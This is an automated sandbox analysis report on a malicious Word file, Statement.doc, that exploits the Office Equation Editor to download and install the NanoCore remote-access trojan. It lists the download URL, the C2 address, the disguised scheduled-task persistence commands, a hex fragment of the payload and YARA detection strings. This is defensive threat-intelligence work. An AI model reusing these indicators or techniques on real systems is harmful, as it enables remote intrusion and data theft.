Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Statement.doc

Overview

General Information

Sample Name:Statement.doc
Analysis ID:345151
MD5:854716b6ff05f02534960443c94340a1
SHA1:6955e99f687a65747a95745b721c43543f3cf389
SHA256:1421f7c867ff97c915fab1236fe5277b3116b426c0102f805fab25ef19fc681c
Tags:doc

Most interesting Screenshot:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Nanocore Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: NanoCore
Sigma detected: Scheduled temp file as task from temp location
Yara detected Nanocore RAT
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Contains functionality to hide a thread from the debugger
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2284 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 2424 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • JNM.exe (PID: 1692 cmdline: C:\Users\user\AppData\Roaming\JNM.exe MD5: 10D30AD1922421E73E133AD020DF424F)
      • cmd.exe (PID: 1780 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: AD7B9C14083B52BC532FBA5948342B98)
        • timeout.exe (PID: 2336 cmdline: timeout 1 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
      • JNM.exe (PID: 2304 cmdline: C:\Users\user\AppData\Roaming\JNM.exe MD5: 10D30AD1922421E73E133AD020DF424F)
        • schtasks.exe (PID: 2808 cmdline: 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp6D54.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
        • schtasks.exe (PID: 2476 cmdline: 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp5A32.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
  • taskeng.exe (PID: 2464 cmdline: taskeng.exe {C7405FE6-0EEB-43B9-A9C9-0A01615FAA8D} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)
    • JNM.exe (PID: 2360 cmdline: C:\Users\user\AppData\Roaming\JNM.exe 0 MD5: 10D30AD1922421E73E133AD020DF424F)
      • cmd.exe (PID: 1360 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: AD7B9C14083B52BC532FBA5948342B98)
        • timeout.exe (PID: 1480 cmdline: timeout 1 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
      • JNM.exe (PID: 2220 cmdline: C:\Users\user\AppData\Roaming\JNM.exe MD5: 10D30AD1922421E73E133AD020DF424F)
    • smtpsvc.exe (PID: 3012 cmdline: 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0 MD5: 10D30AD1922421E73E133AD020DF424F)
      • cmd.exe (PID: 1836 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: AD7B9C14083B52BC532FBA5948342B98)
        • timeout.exe (PID: 1336 cmdline: timeout 1 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
      • smtpsvc.exe (PID: 1976 cmdline: C:\Program Files (x86)\SMTP Service\smtpsvc.exe MD5: 10D30AD1922421E73E133AD020DF424F)
  • EQNEDT32.EXE (PID: 2176 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"C2: ": ["46.243.219.32"], "Version: ": "NanoCore Client, Version=1.2.2.0"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.2355980746.0000000000402000.00000040.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0xff8d:$x1: NanoCore.ClientPluginHost
  • 0xffca:$x2: IClientNetworkHost
  • 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000007.00000002.2355980746.0000000000402000.00000040.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
    00000007.00000002.2355980746.0000000000402000.00000040.00000001.sdmpNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
    • 0xfcf5:$a: NanoCore
    • 0xfd05:$a: NanoCore
    • 0xff39:$a: NanoCore
    • 0xff4d:$a: NanoCore
    • 0xff8d:$a: NanoCore
    • 0xfd54:$b: ClientPlugin
    • 0xff56:$b: ClientPlugin
    • 0xff96:$b: ClientPlugin
    • 0xfe7b:$c: ProjectData
    • 0x10882:$d: DESCrypto
    • 0x1824e:$e: KeepAlive
    • 0x1623c:$g: LogClientMessage
    • 0x12437:$i: get_Connected
    • 0x10bb8:$j: #=q
    • 0x10be8:$j: #=q
    • 0x10c04:$j: #=q
    • 0x10c34:$j: #=q
    • 0x10c50:$j: #=q
    • 0x10c6c:$j: #=q
    • 0x10c9c:$j: #=q
    • 0x10cb8:$j: #=q
    00000017.00000002.2141461883.0000000000402000.00000040.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0xff8d:$x1: NanoCore.ClientPluginHost
    • 0xffca:$x2: IClientNetworkHost
    • 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    00000017.00000002.2141461883.0000000000402000.00000040.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
      Click to see the 38 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      7.2.JNM.exe.620000.2.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0xe75:$x1: NanoCore.ClientPluginHost
      • 0xe8f:$x2: IClientNetworkHost
      7.2.JNM.exe.620000.2.raw.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
      • 0xe75:$x2: NanoCore.ClientPluginHost
      • 0x1261:$s3: PipeExists
      • 0x1136:$s4: PipeCreated
      • 0xeb0:$s5: IClientLoggingHost
      7.2.JNM.exe.400000.0.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0x1018d:$x1: NanoCore.ClientPluginHost
      • 0x101ca:$x2: IClientNetworkHost
      • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
      7.2.JNM.exe.400000.0.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
      • 0xff05:$x1: NanoCore Client.exe
      • 0x1018d:$x2: NanoCore.ClientPluginHost
      • 0x117c6:$s1: PluginCommand
      • 0x117ba:$s2: FileCommand
      • 0x1266b:$s3: PipeExists
      • 0x18422:$s4: PipeCreated
      • 0x101b7:$s5: IClientLoggingHost
      7.2.JNM.exe.400000.0.unpackJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
        Click to see the 15 entries

        Sigma Overview

        System Summary:

        barindex
        Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
        Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\JNM.exe, CommandLine: C:\Users\user\AppData\Roaming\JNM.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\JNM.exe, NewProcessName: C:\Users\user\AppData\Roaming\JNM.exe, OriginalFileName: C:\Users\user\AppData\Roaming\JNM.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2424, ProcessCommandLine: C:\Users\user\AppData\Roaming\JNM.exe, ProcessId: 1692
        Sigma detected: EQNEDT32.EXE connecting to internetShow sources
        Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 84.38.135.158, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2424, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
        Sigma detected: File Dropped By EQNEDT32EXEShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2424, TargetFilename: C:\Users\user\AppData\Roaming\JNM.exe
        Sigma detected: NanoCoreShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\JNM.exe, ProcessId: 2304, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat
        Sigma detected: Scheduled temp file as task from temp locationShow sources
        Source: Process startedAuthor: Joe Security: Data: Command: 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp6D54.tmp', CommandLine: 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp6D54.tmp', CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\JNM.exe, ParentImage: C:\Users\user\AppData\Roaming\JNM.exe, ParentProcessId: 2304, ProcessCommandLine: 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp6D54.tmp', ProcessId: 2808

        Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Found malware configurationShow sources
        Source: JNM.exe.2304.7.memstrMalware Configuration Extractor: NanoCore {"C2: ": ["46.243.219.32"], "Version: ": "NanoCore Client, Version=1.2.2.0"}
        Multi AV Scanner detection for domain / URLShow sources
        Source: manojvashanava234.sytes.netVirustotal: Detection: 10%Perma Link
        Source: http://manojvashanava234.sytes.net/WAH.exeVirustotal: Detection: 9%Perma Link
        Multi AV Scanner detection for dropped fileShow sources
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeReversingLabs: Detection: 34%
        Source: C:\Users\user\AppData\Roaming\JNM.exeReversingLabs: Detection: 34%
        Multi AV Scanner detection for submitted fileShow sources
        Source: Statement.docVirustotal: Detection: 45%Perma Link
        Source: Statement.docReversingLabs: Detection: 58%
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 00000007.00000002.2355980746.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.2141461883.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.2357133398.0000000002501000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001A.00000002.2148462400.00000000022E1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001A.00000002.2147229612.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000002.2362914038.0000000005389000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.2359067091.0000000003549000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.2356349375.0000000000630000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001A.00000002.2148652827.00000000032E9000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.2173210741.0000000005059000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.2144054472.0000000003549000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.2143981724.0000000002541000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.2359611751.00000000038C4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: JNM.exe PID: 1692, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: JNM.exe PID: 2304, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: JNM.exe PID: 2360, type: MEMORY
        Source: Yara matchFile source: 7.2.JNM.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.JNM.exe.630000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 26.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.JNM.exe.630000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 23.2.JNM.exe.400000.0.unpack, type: UNPACKEDPE
        Machine Learning detection for dropped fileShow sources
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Roaming\JNM.exeJoe Sandbox ML: detected
        Source: 7.2.JNM.exe.630000.3.unpackAvira: Label: TR/NanoCore.fadte

        Exploits:

        barindex
        Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\JNM.exeJump to behavior
        Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
        Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

        Compliance:

        barindex
        Uses new MSVCR DllsShow sources
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
        Binary contains paths to debug symbolsShow sources
        Source: Binary string: Pinaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: JNM.exe, 00000003.00000002.2356181917.00000000004D6000.00000004.00000020.sdmp
        Source: Binary string: \REGISTRY\USER\S-1-5-21-966771315-3019405637-367336477-1006_Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4JNM.PDB-F424491E3931}\Servererver32 source: JNM.exe, 0000000F.00000002.2355712720.0000000000298000.00000004.00000001.sdmp
        Source: Binary string: \REGISTRY\USER\S-1-5-21-966771315-3019405637-367336477-1006_Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4JNM.PDB-F424491E3931}\Servererver32h source: JNM.exe, 00000003.00000002.2356038607.00000000003E8000.00000004.00000001.sdmp
        Source: Binary string: MC:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbicddH?X source: JNM.exe, 00000003.00000002.2356207673.00000000004FA000.00000004.00000020.sdmp
        Source: Binary string: 8inaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: JNM.exe, 0000000F.00000002.2356007529.0000000000373000.00000004.00000020.sdmp
        Source: Binary string: >vbpC:\Users\user\AppData\Roaming\JNM.PDBBPJQ source: JNM.exe, 00000003.00000002.2356038607.00000000003E8000.00000004.00000001.sdmp
        Source: Binary string: 8(P5jLC:\Windows\Microsoft.VisualBasic.pdb source: JNM.exe, 0000000F.00000002.2355712720.0000000000298000.00000004.00000001.sdmp
        Source: Binary string: Qsers\user\AppData\Roaming\JNM.exeVisualBasic.pdb*n source: JNM.exe, 00000003.00000002.2356207673.00000000004FA000.00000004.00000020.sdmp
        Source: Binary string: 8C:\Users\user\AppData\Roaming\JNM.PDB source: JNM.exe, 0000000F.00000002.2355712720.0000000000298000.00000004.00000001.sdmp
        Source: Binary string: C:\Users\user\AppData\Roaming\JNM.exe77-1006j_731629843\objr\x86\Microsoft.VisualBasic.pdbisualBasic.pdb source: JNM.exe, 00000003.00000002.2356038607.00000000003E8000.00000004.00000001.sdmp, JNM.exe, 0000000F.00000002.2355712720.0000000000298000.00000004.00000001.sdmp
        Source: Binary string: QC:\Users\user\AppData\Roaming\JNM.PDB source: JNM.exe, 00000003.00000002.2356038607.00000000003E8000.00000004.00000001.sdmp
        Source: Binary string: M.PDBr source: JNM.exe, 0000000F.00000002.2356007529.0000000000373000.00000004.00000020.sdmp
        Source: Binary string: (P5jLC:\Windows\Microsoft.VisualBasic.pdb source: JNM.exe, 00000003.00000002.2356038607.00000000003E8000.00000004.00000001.sdmp
        Source: Binary string: ,:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: JNM.exe, 0000000F.00000002.2356007529.0000000000373000.00000004.00000020.sdmp
        Source: Binary string: )vbpC:\Users\user\AppData\Roaming\JNM.PDB.x source: JNM.exe, 0000000F.00000002.2355712720.0000000000298000.00000004.00000001.sdmp
        Source: Binary string: :\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: JNM.exe, 00000003.00000002.2366184294.0000000006EF0000.00000004.00000001.sdmp
        Source: global trafficDNS query: name: manojvashanava234.sytes.net
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 84.38.135.158:80
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 84.38.135.158:80

        Networking:

        barindex
        C2 URLs / IPs found in malware configurationShow sources
        Source: Malware configuration extractorIPs: 46.243.219.32
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 46.243.219.32:2420
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 27 Jan 2021 18:12:25 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/8.0.1Last-Modified: Wed, 27 Jan 2021 18:12:25 GMTETag: W/"1e1e00-5b9e73c7fac88"Accept-Ranges: bytesContent-Length: 1973760Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 02 00 e7 39 11 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 1a 1e 00 00 02 00 00 00 00 00 00 5e 38 1e 00 00 20 00 00 00 40 1e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 1e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 38 1e 00 4b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 1e 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 64 18 1e 00 00 20 00 00 00 1a 1e 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 1e 00 00 02 00 00 00 1c 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 38 1e 00 00 00 00 00 48 00 00 00 02 00 05 00 b0 52 00 00 60 e5 1d 00 03 00 00 00 94 01 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 2a 1a 20 00 00 00 00 2a fa fe 09 01 00 39 30 00 00 00 28 95 01 00 06 39 18 00 00 00 fe 09 00 00 72 60 02 1d 70 fe 09 01 00 28 43 00 00 0a 28 44 00 00 0a 2a fe 09 00 00 fe 09 01 00 28 45 00 00 0a 2a fe 09 00 00 2a 2a fe 09 00 00 28 5f 00 00 0a 2a 00 13 30 01 00 5f 08 00 00 00 00 00 00 28 93 01 00 06 28 92 01 00 06 28 91 01 00 06 28 90 01 00 06 28 8f 01 00 06 28 8e 01 00 06 28 8d 01 00 06 28 8c 01 00 06 28 8b 01 00 06 28 8a 01 00 06 28 89 01 00 06 fe 06 01 00 00 0a 80 87 01 00 04 28 88 01 00 06 28 87 01 00 06 28 86 01 00 06 fe 06 02 00 00 0a 80 86 01 00 04 28 85 01 00 06 28 84 01 00 06 28 83 01 00 06 fe 06 03 00 00 0a 80 85 01 00 04 28 82 01 00 06 28 81 01 00 06 28 80 01 00 06 28 7f 01 00 06 28 7e 01 00 06 28 7d 01 00 06 28 7c 01 00 06 28 7b 01 00 06 28 7a 01 00 06 28 79 01 00 06 28 78 01 00 06 28 77 01 00 06 28 76 01 00 06 28 75 01 00 06 28 74 01 00 06 28 73 01 00 06 2
        Source: global trafficHTTP traffic detected: GET /WAH.exe HTTP/1.1Connection: Keep-AliveHost: manojvashanava234.sytes.net
        Source: Joe Sandbox ViewASN Name: DATACLUBLV DATACLUBLV
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{55454834-8E09-401E-A760-1A1C7B299BE3}.tmpJump to behavior
        Source: global trafficHTTP traffic detected: GET /WAH.exe HTTP/1.1Connection: Keep-AliveHost: manojvashanava234.sytes.net
        Source: unknownDNS traffic detected: queries for: manojvashanava234.sytes.net
        Source: JNM.exe, 00000003.00000002.2364935179.0000000006420000.00000002.00000001.sdmp, JNM.exe, 00000007.00000002.2361274784.0000000005760000.00000002.00000001.sdmp, taskeng.exe, 0000000D.00000002.2356083438.0000000001BE0000.00000002.00000001.sdmp, JNM.exe, 0000000F.00000002.2363821875.00000000064C0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
        Source: JNM.exe, 00000003.00000002.2364935179.0000000006420000.00000002.00000001.sdmp, JNM.exe, 00000007.00000002.2361274784.0000000005760000.00000002.00000001.sdmp, taskeng.exe, 0000000D.00000002.2356083438.0000000001BE0000.00000002.00000001.sdmp, JNM.exe, 0000000F.00000002.2363821875.00000000064C0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
        Source: JNM.exe, 00000007.00000002.2359067091.0000000003549000.00000004.00000001.sdmpBinary or memory string: RegisterRawInputDevices

        E-Banking Fraud:

        barindex
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 00000007.00000002.2355980746.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.2141461883.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.2357133398.0000000002501000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001A.00000002.2148462400.00000000022E1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001A.00000002.2147229612.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000002.2362914038.0000000005389000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.2359067091.0000000003549000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.2356349375.0000000000630000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001A.00000002.2148652827.00000000032E9000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.2173210741.0000000005059000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.2144054472.0000000003549000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.2143981724.0000000002541000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.2359611751.00000000038C4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: JNM.exe PID: 1692, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: JNM.exe PID: 2304, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: JNM.exe PID: 2360, type: MEMORY
        Source: Yara matchFile source: 7.2.JNM.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.JNM.exe.630000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 26.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.JNM.exe.630000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 23.2.JNM.exe.400000.0.unpack, type: UNPACKEDPE

        System Summary:

        barindex
        Malicious sample detected (through community Yara rule)Show sources
        Source: 00000007.00000002.2355980746.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000007.00000002.2355980746.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000017.00000002.2141461883.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000017.00000002.2141461883.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001A.00000002.2148462400.00000000022E1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001A.00000002.2147229612.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000001A.00000002.2147229612.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000F.00000002.2362914038.0000000005389000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000F.00000002.2362914038.0000000005389000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000007.00000002.2359067091.0000000003549000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000007.00000002.2356337271.0000000000620000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000007.00000002.2356349375.0000000000630000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000001A.00000002.2148652827.00000000032E9000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000010.00000002.2173210741.0000000005059000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000010.00000002.2173210741.0000000005059000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000017.00000002.2144054472.0000000003549000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
